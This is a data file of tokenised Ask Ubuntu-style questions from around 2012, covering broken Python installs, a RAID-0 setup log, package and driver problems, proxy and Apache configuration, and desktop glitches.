230995	how to fix broken python installation	i have done something with my python installation , do n't remember what exactly . but i am getting an error when i try to open python command line now : richard @ richard-desktop : ~/projects/hello $ python traceback ( most recent call last ) : file `` /usr/lib/python2.7/site.py '' , line 562 , in < module > main ( ) file `` /usr/lib/python2.7/site.py '' , line 544 , in main known_paths = addusersitepackages ( known_paths ) file `` /usr/lib/python2.7/site.py '' , line 271 , in addusersitepackages user_site = getusersitepackages ( ) file `` /usr/lib/python2.7/site.py '' , line 246 , in getusersitepackages user_base = getuserbase ( ) # this will also set user_base file `` /usr/lib/python2.7/site.py '' , line 236 , in getuserbase user_base = get_config_var ( 'userbase ' ) file `` /usr/lib/python2.7/sysconfig.py '' , line 577 , in get_config_var return get_config_vars ( ) .get ( name ) file `` /usr/lib/python2.7/sysconfig.py '' , line 476 , in get_config_vars _init_posix ( _config_vars ) file `` /usr/lib/python2.7/sysconfig.py '' , line 344 , in _init_posix raise ioerror ( msg ) ioerror : invalid python installation : unable to open /usr/lib/python2.7/config/makefile ( no such file or directory ) richard @ richard-desktop : ~/projects/hello $ is there some way to fix this ?
230996	ca n't boot ubuntu 12.10 from usb help ?	i ca n't boot ubuntu from usb flash driver ( 8gb ) from windows xp .. is there any autoboot or something like that . can you answer that now cause my pc is messed up with virus i want to install that now
231000	ssh commandline - ubuntu x64 dedicated server raid-0 array creation log [ after reboot : disk /dev/md127 does n't contain a valid partition table ]	i followed this tutorial but failed as it seems , i tried for a couple times , here i throw the towel : ht-tp : //www.rustyrazorblade.com/2012/07/setting-up-raid0-in-ubuntu-12-04-in-aws-high-io/ the raid creation command i used was mdadm -- create -- verbose -- auto=yes -- chunk=64 /dev/md0 -- level=0 -- raid-devices=2 /dev/sdb1 /dev/sdc1 obv something went wrong as fdisk -ls prints disk /dev/md127 does n't contain a valid partition table after the reboot . iam looking for a solution to get this correctly setup . the full install log is : login as : root root @ '' serverip '' 's password : welcome to ubuntu 12.04.1 lts ( gnu/linux 3.2.0-35-generic x86_64 ) documentation : ht-tps : //help.ubuntu.com/ you have mail . last login : thu dec 20 11:11:17 2012 from p4fe4fd1a.dip.t-dialin.net root @ j064 : ~ # fdisk -ls disk /dev/sda : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00025802 device boot start end blocks id system /dev/sda1 261 7812500 3906120 82 linux swap / solaris /dev/sda2 * 7813120 249554943 120870912 83 linux disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe92120fa device boot start end blocks id system disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdc does n't contain a valid partition table root @ j064 : ~ # apt-get install mdadm reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : mdadm 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 520 kb of archives . after this operation , 1185 kb of additional disk space will be used . get:1 ht-tp : //fr.archive.ubuntu.com/ubuntu/ precise-updates/main mdadm amd64 3.2.5-1ubuntu0.2 [ 520 kb ] fetched 520 kb in 0s ( 1030 kb/s ) preconfiguring packages ... selecting previously unselected package mdadm . ( reading database ... 76517 files and directories currently installed . ) unpacking mdadm ( from ... /mdadm_3.2.5-1ubuntu0.2_amd64.deb ) ... processing triggers for ureadahead ... setting up mdadm ( 3.2.5-1ubuntu0.2 ) ... generating mdadm.conf ... done . removing any system startup links for /etc/init.d/mdadm-raid ... update-initramfs : deferring update ( trigger activated ) * starting md monitoring service mdadm -- monitor [ ok ] processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-35-generic w : mdadm : /etc/mdadm/mdadm.conf defines no arrays . root @ j064 : ~ # sudo fdisk /dev/sdb command ( m for help ) : d no partition is defined yet ! command ( m for help ) : n partition type : p primary ( 0 primary , 0 extended , 4 free ) e extended select ( default p ) : p partition number ( 1-4 , default 1 ) : using default value 1 first sector ( 2048-1953525167 , default 2048 ) : using default value 2048 last sector , +sectors or +size { k , m , g } ( 2048-1953525167 , default 1953525167 ) : using default value 1953525167 command ( m for help ) : t selected partition 1 hex code ( type l to list codes ) : fd changed system type of partition 1 to fd ( linux raid autodetect ) command ( m for help ) : w the partition table has been altered ! calling ioctl ( ) to re-read partition table . syncing disks . root @ j064 : ~ # sudo fdisk /dev/sdc device contains neither a valid dos partition table , nor sun , sgi or osf disklabel building a new dos disklabel with disk identifier 0x8d60ef66 . changes will remain in memory only , until you decide to write them . after that , of course , the previous content wo n't be recoverable . warning : invalid flag 0x0000 of partition table 4 will be corrected by w ( rite ) command ( m for help ) : d no partition is defined yet ! command ( m for help ) : n partition type : p primary ( 0 primary , 0 extended , 4 free ) e extended select ( default p ) : p > partition number ( 1-4 , default 1 ) : using default value 1 first sector ( 2048-1953525167 , default 2048 ) : using default value 2048 last sector , +sectors or +size { k , m , g } ( 2048-1953525167 , default 1953525167 ) : using default value 1953525167 command ( m for help ) : t selected partition 1 hex code ( type l to list codes ) : fd changed system type of partition 1 to fd ( linux raid autodetect ) command ( m for help ) : w the partition table has been altered ! calling ioctl ( ) to re-read partition table . syncing disks . root @ j064 : ~ # fdisk -ls disk /dev/sda : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00025802 device boot start end blocks id system /dev/sda1 261 7812500 3906120 82 linux swap / solaris /dev/sda2 * 7813120 249554943 120870912 83 linux disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 81 heads , 63 sectors/track , 382818 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe92120fa device boot start end blocks id system /dev/sdb1 2048 1953525167 976761560 fd linux raid autodetect disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 81 heads , 63 sectors/track , 382818 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x8d60ef66 device boot start end blocks id system /dev/sdc1 2048 1953525167 976761560 fd linux raid `autodetect root @ j064 : ~ # sudo mdadm -- create -- verbose -- auto=yes -- chunk=64 /dev/md0 -- level=0 -- raid-devices=2 /dev/sdb1 /dev/sdc1 mdadm : defaulting to version 1.2 metadata mdadm : array /dev/md0 started . root @ j064 : ~ # sudo apt-get install xfsprogs reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libreadline5 suggested packages : xfsdump attr quota the following new packages will be installed : libreadline5 xfsprogs 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 1354 kb of archives . after this operation , 3082 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 ht-tp : //filepile.fastit.net/ubuntu/ precise/main libreadline5 amd64 5.2-11 [ 128 kb ] get:2 ht-tp : //filepile.fastit.net/ubuntu/ precise/main xfsprogs amd64 3.1.7 [ 1226 kb ] fetched 1354 kb in 0s ( 1991 kb/s ) selecting previously unselected package libreadline5 . ( reading database ... 76568 files and directories currently installed . ) unpacking libreadline5 ( from ... /libreadline5_5.2-11_amd64.deb ) ... selecting previously unselected package xfsprogs . unpacking xfsprogs ( from ... /xfsprogs_3.1.7_amd64.deb ) ... setting up libreadline5 ( 5.2-11 ) ... setting up xfsprogs ( 3.1.7 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place root @ j064 : ~ # sudo mkfs -t ext4 /dev/md0 mke2fs 1.42 ( 29-nov-2011 ) filesystem label= os type : linux block size=4096 ( log=2 ) fragment size=4096 ( log=2 ) stride=16 blocks , stripe width=32 blocks 122101760 inodes , 488380768 blocks 24419038 blocks ( 5.00 % ) reserved for the super user first data block=0 maximum filesystem blocks=4294967296 14905 block groups 32768 blocks per group , 32768 fragments per group 8192 inodes per group superblock backups stored on blocks : 32768 , 98304 , 163840 , 229376 , 294912 , 819200 , 884736 , 1605632 , 2654208 , 4096000 , 7962624 , 11239424 , 20480000 , 23887872 , 71663616 , 78675968 , 102400000 , 214990848 allocating group tables : done writing inode tables : done creating journal ( 32768 blocks ) : done writing superblocks and filesystem accounting information : done root @ j064 : ~ # mkdir /mnt/bigraid root @ j064 : ~ # mount /dev/md0 /mnt/bigraid/ root @ j064 : ~ # df -h filesystem size used avail use % mounted on /dev/sda2 114g 2.7g 106g 3 % / udev 3.9g 4.0k 3.9g 1 % /dev tmpfs 1.6g 284k 1.6g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 0 3.9g 0 % /run/shm /dev/md0 1.8t 196m 1.7t 1 % /mnt/bigraid root @ j064 : ~ # dd if=/dev/zero of=/mnt/bigraid/somefile bs=512 ^c10271932+0 records in 10271931+0 records out 5259228672 bytes ( 5.3 gb ) copied , 20.3628 s , 258 mb/s root @ j064 : ~ # dd if=/dev/zero of=/mnt/bigraid/somefile bs=2048 ^c 1083452+0 records in 1083452+0 records out 2218909696 bytes ( 2.2 gb ) copied , 10.4948 s , 211 mb/s root @ j064 : ~ # root @ j064 : ~ # hdparm -t /dev/md0 /dev/md0 : timing buffered disk reads : 582 mb in 3.00 seconds = 193.96 mb/sec root @ j064 : ~ # fdisk -ls disk /dev/sda : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00025802 device boot start end blocks id system /dev/sda1 261 7812500 3906120 82 linux swap / solaris /dev/sda2 * 7813120 249554943 120870912 83 linux disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 81 heads , 63 sectors/track , 382818 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe92120fa device boot start end blocks id system /dev/sdb1 2048 1953525167 976761560 fd linux raid autodetect disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 81 heads , 63 sectors/track , 382818 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x8d60ef66 device boot start end blocks id system /dev/sdc1 2048 1953525167 976761560 fd linux raid autodetect disk /dev/md0 : 2000.4 gb , 2000407625728 bytes 2 heads , 4 sectors/track , 488380768 cylinders , total 3907046144 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 65536 bytes / 131072 bytes disk identifier : 0x00000000 disk /dev/md0 does n't contain a valid partition table root @ j064 : ~ # cd /mnt/bigraid root @ j064 : /mnt/bigraid # reboot login as : root root @ '' ip '' 's password : welcome to ubuntu 12.04.1 lts ( gnu/linux 3.2.0-35-generic x86_64 ) documentation : ht-tps : //help.ubuntu.com/ you have mail . last login : thu dec 20 11:14:36 2012 from p4fe4fd1a.dip.t-dialin.net root @ j064 : ~ # fdisk -ls disk /dev/sda : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00025802 device boot start end blocks id system /dev/sda1 261 7812500 3906120 82 linux swap / solaris /dev/sda2 * 7813120 249554943 120870912 83 linux disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 81 heads , 63 sectors/track , 382818 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe92120fa device boot start end blocks id system /dev/sdb1 2048 1953525167 976761560 fd linux raid autodetect disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 81 heads , 63 sectors/track , 382818 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x8d60ef66 device boot start end blocks id system /dev/sdc1 2048 1953525167 976761560 fd linux raid autodetect disk /dev/md127 : 2000.4 gb , 2000407625728 bytes 2 heads , 4 sectors/track , 488380768 cylinders , total 3907046144 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 65536 bytes / 131072 bytes disk identifier : 0x00000000 disk /dev/md127 does n't contain a valid partition table root @ j064 : ~ # partprobe root @ j064 : ~ # reboot login as : root root @ '' ip '' 's password : welcome to ubuntu 12.04.1 lts ( gnu/linux 3.2.0-35-generic x86_64 ) documentation : ht-tps : //help.ubuntu.com/ you have mail . last login : thu dec 20 11:36:04 2012 from p4fe4fd1a.dip.t-dialin.net root @ j064 : ~ # fdisk -ls disk /dev/sda : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00025802 device boot start end blocks id system /dev/sda1 261 7812500 3906120 82 linux swap / solaris /dev/sda2 * 7813120 249554943 120870912 83 linux disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 81 heads , 63 sectors/track , 382818 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe92120fa device boot start end blocks id system /dev/sdb1 2048 1953525167 976761560 fd linux raid autodetect disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 81 heads , 63 sectors/track , 382818 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x8d60ef66 device boot start end blocks id system /dev/sdc1 2048 1953525167 976761560 fd linux raid autodetect disk /dev/md127 : 2000.4 gb , 2000407625728 bytes 2 heads , 4 sectors/track , 488380768 cylinders , total 3907046144 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 65536 bytes / 131072 bytes disk identifier : 0x00000000 disk /dev/md127 does n't contain a valid partition table root @ j064 : ~ #
231002	no user/host info in terminal prompt	i open terminal and see only this : $ as to where i expect it to look like user @ host : ~ $ screenshot here do you have any idea , what i need to do to get the regular shell prompt back ? i am using ubuntu 12.10 .
231004	ca n't install skype through software center 12.04	new install of ubuntu 12.04.1 . start ubuntu software center . edit menu > software sources > other > tick the canonical partners sources . click close . search for skype . skype app is not listed . following the suggestion i have reinstalled software center ( surely there 's a bug if the software center needs reinstalling after adding a source ! ) , but still it does not show . fyi : at a terminal apt-cache search skype lists skype and skype-bin . i am comfortable at the command line , but people i am installing ubuntu for are not . this is a real paper-cut - the first time i show them the software center , it does n't work and i have to jump to command line . so the question is : how to get it to show up in an easy-to-do user-friendly way ? ps . please do not mark this as a duplicate of how do i install skype unless that page is updated to actually answer this question ( and presumably this and this ) .
231008	printer driver for konical minolta magicolor 1600w ?	i have a new printer and found the proper driver for it when i am using windows , but i work under ubuntu most of the time and the system does not recognize the printer . is there away to install a generic printer that makes it possible for me to use this while i am under ubuntu ? i am using ubuntu 12.04 64 bits . color is not important , as long as i can print my documents , i am ok . i can use windows for color printing . thanks in advance , farhad
231013	symbolic link says it is pointing to correct folder but goes to parent in filezilla	i used the following to create a symbolic link ln -s /var/www/example.com/target/public_html faker when i use readfile faker it shows the correct link but when i navigate through filezilla it take me to /var/www/example.com/target/ and not public_html my web app is not going to the correct folder either . am i doing something wrong ? okay more information ; noticed that it is creating a self referential symbolic public_html link in /var/www/example.com/target/public_html . actually - this only happens when i try to change the target link by force ( -f ) .
231016	internal error - trying to install valve 's steam client via ubuntu software center	valve 's steam client is now open to all said a link and so i decided to install steam client on my ubuntu 12.04 machine to try it out . i downloaded the deb file from this page . once after the download is completed and i double-clicked to install it and as expected ubuntu software centre is launched but with error as stated below : internal error `` the file /home/pras/downloads/steam_latest.deb ca n't be opened '' . even i tried to install it via sudo dpkg -i steam_latest.deb which also throws errors pras @ tuxbox : ~/downloads $ sudo dpkg -i steam_latest.deb [ sudo ] password for pras : ( reading database ... 408406 files and directories currently installed . ) unpacking steam ( from steam_latest.deb ) ... dpkg-deb ( subprocess ) : short read on buffer copy for failed to write to pipe in copy dpkg-deb : error : subprocess paste returned error exit status 2 dpkg : error processing steam_latest.deb ( -- install ) : short read on buffer copy for backend dpkg-deb during `./usr/lib/steam/bootstraplinux_ubuntu12_32.tar.xz' processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... processing triggers for man-db ... errors were encountered while processing : steam_latest.deb so how should i install it ?
231027	multiple rails applications on same host name with different folders	when i ssh to amazon ec2 , then pwd /home/ubuntu ls app_1 app_2 app_3 app_4 considering i have mapped my ec2-122** address to some apps.site1.com how can i have multiple rails applications running like if i access , apps.site1.com/app_1 apps.site1.com/app_2 apps.site1.com/app_3 each of the application should be loaded . one of my friends told he has implemented it for apache+php application , where various index.php files are present and each folder structure is independently available as separate running application . how can i implement this for rails applications ,
231028	cinnamon desktop broken after theme install	i 'm new to cinnamon . i installed a theme then uninstalled it from command line . but i have classic old looking gnome desktop , although i checked that i have cinnamon and reinstalled it just in case . but still , i have applications and places on left corner of my desktop . and i can not change to any theme for cinnamon from cinnamon settings .
231044	how to fix the dell mini 10v ( 1010 ) touchpad with ubuntu 12.04.1	i 've just installed 12.04.1 from scratch on my mini 10v , and the touchpad is behaving a bit oddly . it 's got buttons integrated into the touchpad , and it looks as though a touch on a button is also being registered as a touch on the touchpad , causing all sorts of problems with clicking and dragging . is there a fix for this ? i seem to remember on very old versions of ubuntu having to disable the lower part of the touchpad , but i do n't think it 's been an issue for some time .
231046	serious problem with wifi device and driver	i am running a laptop powered by acer model : acer aspire 4250 processor : e450 apu ram : 2gb wireless : atheros communications inc. ar9485 wireless network adapter wifi driver : ath9k problem is after 30min of start wifi device fails to connect . it shows password is not match , also it takes too much processor . after a restart everything works fine but same things happen after 5 min . dmesg shows os fails to wake up wifi adapter . is it a hardware problem or software ? used os : ubuntu 11.10 , 12.04 , 12.10 , mint 12 , windows 7 this problem start after 2/3 days of fresh installation ( no problem within 2 days ) . but i did n't get any problem with windows7 . i tried no encryption option with ath9k driver . also tried wicd-network-manager instead of gnome-network-manager
231050	configuring proxy on 12.04 without gedit installed	new to linux and the command line , so go easy on me please . i 've installed 12.04 and at point of install did n't add the proxy in . i now realise that was a mistake and rather than reload the os i 'd rather know how to do it . i 've loaded the command line os , not the gui version , so after i 've logged in , how do i add/configure the proxy settings ? i tried this : sudo gedit /etc/apt/apt.conf ( as i was then going to do : acquire : :http : :proxy `` http : //username : password @ proxy_server : proxy_port '' ; ) but was told i need to install gedit first so when i tried : sudo apt-get install gedit i get : e : unable to locate package gedit is this because it can not get to the web to find it ? any help would be appreciated .
231051	updating problem with post-gresql 9.1	i have the following error when updating my ubuntu : $ sudo apt-get upgrade [ ... ] lecture des listes de paquets ... fait construction de l'arbre des dépendances lecture des informations d'état ... fait vous pouvez lancer « apt-get -f install » pour corriger ces problèmes . les paquets suivants contiennent des dépendances non satisfaites : postgresql-client-9.1 : casse : postgresql-9.1 ( < 9.1.7-0ubuntu12.04 ) mais 9.1.6-1~precise2 est installé postgresql-contrib-9.1 : dépend : postgresql-9.1 ( = 9.1.7-0ubuntu12.04 ) mais 9.1.6-1~precise2 est installé e : dépendances manquantes . essayez d'utiliser l'option -f. $ sudo apt-get -f install dpkg : des problèmes de dépendances empêchent la configuration de postgresql-9.1 : postgresql-client-9.1 ( 9.1.7-0ubuntu12.04 ) casse postgresql-9.1 ( < < 9.1.7-0ubuntu12.04 ) et est installé . la version de postgresql-9.1 à configurer est 9.1.6-1~precise2 . dpkg : erreur de traitement de postgresql-9.1 ( -- configure ) : problèmes de dépendances - laissé non configuré aucun rapport « apport » n'a été créé car le message d'erreur indique une erreur consécutive à un échec précédent . dpkg : des problèmes de dépendances empêchent la configuration de postgresql-contrib-9.1 : postgresql-contrib-9.1 dépend de postgresql-9.1 ( = 9.1.7-0ubuntu12.04 ) ; cependant : la version de postgresql-9.1 sur le système est 9.1.6-1~precise2 . dpkg : erreur de traitement de postgresql-contrib-9.1 ( -- configure ) : problèmes de dépendances - laissé non configuré des erreurs ont été rencontrées pendant l'exécution : postgresql-9.1 postgresql-contrib-9.1 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i am using postgre-sql with qgis ( & had a hell of a hard time to install everything as to everything work fine ) , it worked good for a few months and now ( since this morning ) i have this problem and i do n't know what to do ? ? ... i tried to desactivate the ubuntugis-unstable repository and perform `` sudo apt-get -f install '' but with no success ... i checked on the internet without finding my specific problem ... . unfortunately i 'm not a ubuntu expert so i 'm hoping to get an advice from one of you ... i hope the solution is not to uninstall everything ... thank you for your help !
231055	how to make sound output volume above 100 % permanently	my sound level is very low on my laptop . to coup with it i regularly put it above 100 % in sound output volume ( suv ) to make things better : i wonder if there is solution to make my suv 110 % by default . so that when i put my sound level to the max next time it will be 10 % louder .
231058	unable to mount blank-dvdr disk	i have inserted a blank disk into my dvd-rw but in ubuntu its showing an error that unable to mount the place is already mounted ?
231062	how to change language of kde software installed in ubuntu	i would like to know how to change the language of the kde software ( gwen and okular ) that i installed in my ubuntu . my ubuntu is in french , but the kde software is in english . when i `` switch the language '' in `` help '' , it does not offer me that american english . i am using ubuntu 12.04.1 lts with unity desktop .
231065	real time vs. process time	when using the time command to measure time of different executions of a process ( under different hardware circumstances ) , i came across a phenomenon that i do n't understand . the real time of the 1st execution was 77 minutes and 82 minutes for the 2nd execution . however , the user time was 6 minutes faster in the 2nd execution and similarly for the sys time the 2nd execution was 1 minute faster . how can the real time still be better for the 1st execution ? and when comparing execution times , which one of the 3 times is a good indicator for the general execution time of a process ? ( i have processes that prints out a lot of info and processes that do n't print out anything , if that makes any difference )
231067	12.04 lts running slow	i moved on the ubuntu a few month ago . at the begining i was flyging with this system . however , it becomes running too slow nevertheles there is no additional problem or loading to system . at this point , do you have any solution , or recommendition to get more stable ?
231068	running extremely slow , and laggy	i started by using the web installer , and installing ubuntu 12.10 on my samsung np305-e5a laptop ( 4gb ddr ram , amd integrated graphics ) , this was extremely laggy and slow while running simple tasks like firefox . i installed the proprietory drivers for the graphics chip , with little success . my next venture was to try ubuntu 12.04 , and make use of unity 2d . after uninstalling 12.10 and installing 12.04 and running on unity 2d with the proprietory drivers , i 'm at a complete loss . the operating is extremely laggy and freezes completely for minutes on end . it especially chokes when extracting a tar file , while browsing firefox . also , copying and pasting files less than 100mb will cause the computer to come to a complete stand still for upwards of 30 seconds . i 'm wondering what steps i should take to increase the speeds because i 'm sure this is not normal . oh and i 'm using the 64bit install . the specifications of the computer are : amd a series quad core a6 3420m processor 1.5ghz 4gb ddr3 ram 500gb hard drive amd radeon hd 6520g yes , i installed the latest beta drivers available from amd , 12.11 beta . output of df -h df -h filesystem size used avail use % mounted on /dev/loop0 17g 3.6g 14g 22 % / udev 1.7g 4.0k 1.7g 1 % /dev tmpfs 687m 856k 686m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.7g 460k 1.7g 1 % /run/shm /dev/sda2 179g 110g 70g 62 % /host
231069	how to install ubuntu on a samsung np355v5c-s03in with an amd apu	i placed an order for samsung np355v5c-s03in ( amd a8 version ) which i will receive soon . this model comes with 750gb hdd ( single partition ) & has win 7 home premium x64 preloaded . i want to create 2 new partitions of 100gb each & install ubuntu 12.10 & backtrack 5 r3 . i never used an amd apu based machine before & i heard that installing linux in amd apu system is not an easy task . i would be very grateful if experts here mention the steps involved in installing both these os in amd apu laptop . thankyou . @ iseth thanks but the link you shared has nothing about installing ubuntu in amd apu laptop . afaik one needs to change some settings in bios or tweak bootloader .
231071	internet ( wifi and ethernet ) in 12.04 after some time just stops working	so i have 12.04 on a hp pavilion g series laptop . 12.04 works fine on my computer . then several weeks ago , my laptop would no longer connect to the internet . my tablet connects fine . i booted ubuntu on my usb and it works fine . something seems to be wrong `` within '' ubuntu . i have now reinstalled ubuntu 4 times . after varying amounts of time the same problem reoccurs ( and i have stopped updating any software in case this is the problem ) . i use cisco anyconnect and real vnc to log into a server somewhere else ( they are the only programs i could imagine causing any problems ) .
231072	ubuntu precise system headers moved somewhere else and sys/ucontext.h can not be found	i 'm in the process of porting some applications from maverick 10.10 to precise 12.04 . some of the system headers do not seem to be in the same place . this is giving me some headaches since it does n't seem to matter that i add the include paths . in particular , on maverick , there was a file in /usr/include/sys/ucontext.h , and this file defines the constant reg_eip . now , on precise , this file has moved to /usr/include/x86_64-linux-gnu/sys/ucontext.h , but g++ 4.6 nor 4.7 have that include path : `gcc -print-prog-name=cc1plus` -v ignoring nonexistent directory `` /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../../x86_64-linux-gnu/include '' # include `` ... '' search starts here : # include < ... > search starts here : /usr/include/c++/4.6 /usr/include/c++/4.6/x86_64-linux-gnu /usr/include/c++/4.6/backward /usr/lib/gcc/x86_64-linux-gnu/4.6/include /usr/local/include /usr/lib/gcc/x86_64-linux-gnu/4.6/include-fixed /usr/include end of search list . the consequence of this is that when including # include < ucontext.h > , reg_eip is not defined i 've tried adding # include < sys/ucontext.h > but i still get the error : error : 'reg_eip ' was not declared in this scope any idea how to fix this ?
231074	getting older packages from ppa	can i install an older version of a specific package from a ppa ? specifically , i want to get an older version of xserver-xorg-video-intel ( and dependencies ) from xorg-edgers ppa . the reason is that the older version seemed to work with my hardware . the present version seems to feature ( i would like to found out if it is really the source ) severe crashes as the present stable releases of this package do . i tried apt-get install pkg=version but did n't succeed . i am afraid that the packages in the cache are lost after apt-get clean i do not even know the precise version number of the previous version , assuming that it does n't have to be exactly one less . the current version is xserver-xorg-video-intel-2.20.15 alternatively : is there a place , e.g . at launchpad , where i can manually download the previous version of the package ?
231075	configuring a network interface and changing mac adress permanently	i need to configure a network interface permanently eth1 and to change the mac address with the specified format : aa : bb : cc : dd : x : y , before the interface is up . a=1 ; b=2 ; c=2 ; d=2 ; x=6 ; y=8 . i wrote in /etc/network/interfaces : auto eth1 iface eth1 inet static address 10.6.8.200 netmask 255.255.255.128 gateway 10.6.8.129 pre-up ifconfig eth1 hw ether 1a:2b:2c:2d:6:8 i do n't know what i 'm doing wrong .
231076	preconfigured group	does anyone know where to find detail description or documentation for preconfigured groups on ubuntu 12.04 ?
231080	ubuntu 12.10 can not go past the login screen	i am using ubuntu 12.10 after installing iphone mount software i was asked to reboot . after rebooting my password was no more working . i reset the password on recovery mode , now password works but every time i hit enter it keeps bringing me back to login screen . i guess maybe an error on the last software i installed . how can i recover previous setting before the installation ?
231082	how to install canon lbp 810 printer on ubuntu 12.10 ?	can someone explain to me how to install printer canon lbp 810 in ubuntu 12.10 ? please help me . thank you in advance .
231084	upgrading from 6.06 lts to 10.04 lts	have dapper on a server currently and would like to upgrade yet when i have tried system become unstable and i have to revert back to original image . installing on va linux systems 1000 server ( fyi 2000 ) . monitor goes out of range with upgrade attempt .
231087	virtual host configuration problem	i have ubuntu running with apache2 , my website shows in browser when www.example.com but does n't show when example.com , my website is in /home/username/public_html/example.com/public . i used following , which doesnt work sudo bash -c `` cat > > /etc/apache2/sites-available/example.com < < eof < virtualhost *:80 > servername www.example.com serveralias example.com documentroot /home/username/public_html/example.com/public < /virtualhost > eof ''
231090	less css compilers returning blank	i am not even sure where to start debugging this . months ago , i could happily compile my css from my less files . today , i run either recess -- compile test.less or lessc test.less and i just get a blank output . no errors . lessc test.less > test.css just creates a blank file . the twitter-bootstrap makefile for less errors , all be it not helpfully . i 'm using the following simple test.less to debug : @ color : # 4d926f ; # header { color : @ color ; } h2 { color : @ color ; } i 'm on ubuntu 12.10 , i used sudo apt-get install node-less to provide lessc , and installed recess from the directions on github ( npm ) . both just give me empty output . even lessc -- version returns nothing . which lessc shows /usr/local/bin/lessc and the file is n't empty . something must have happened to my node installation perhaps , but no idea how to debug this . apt-get remove -- purge node-less and reinstalling did n't help . many thanks for the help or any tips on debugging !
231093	acer aspire one 725 temperature	i just got my ao725 and i have sucessfully installed xubuntu 12.10 . it 's all okay except the temperature which is pretty high if i look to some reviews on the web - it 's about 70 to 85째 c. i do n't have any additional drivers installed , because i only installed the system and some programs . what could be a problem or it 's that the normal temperature for netbook like this ?
231094	no maximise/minimise/close buttons on a new window	when i opened a new window ( not maximised ) i used to close with the left-top buttons , now they do n't exist anymore . to close it i must drag it or maximise it ... where the hell did the buttons go ! ? a image of the issue :
